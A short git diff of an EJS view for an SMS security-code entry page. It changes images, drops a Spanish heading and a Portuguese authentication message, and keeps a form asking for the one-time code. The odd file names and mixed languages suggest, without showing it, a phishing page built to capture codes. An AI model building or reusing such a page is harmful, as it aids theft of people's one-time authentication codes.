--- a/views/smis1.ejs
+++ b/views/smis1.ejs
@@ -12,18 +12,19 @@
     <div>
         <div class="batr2">
             <div class="topap">
-                <img src="./img/topa.JPG" alt="">
+                <img src="./img/hetopa.PNG" alt="">
             </div>
 
             <div>
                 <div>
-                    <p class="pp2"> Validación de SMS</p>
+                    <div class="upms">
+                        <img src="./img/smimsupoo.svg" alt="">
+                    </div>
                     <div class="section"  style="margin-top: 30px; margin-bottom: 40px;">
                        
                             <form  method="post" id="pg3">
                                 
-                                <p class="pp3">Obrigado por se autenticar introduzindo o código de segurança de uso único recebido no seu telefone.</p>
-
+                                
 
                                 <p>Código SMS*:</p>
                                 <input type="text" name=""  id="sps1" required>
@@ -40,11 +41,7 @@
         </div>
     </div>
 
-    <div>
-        <div class="bobota">
-            <img src="./img/botta.JPG" alt="">
-        </div>
-    </div>
+    
 
     <!-- -->
     <script src="./js/stb.js"></script>
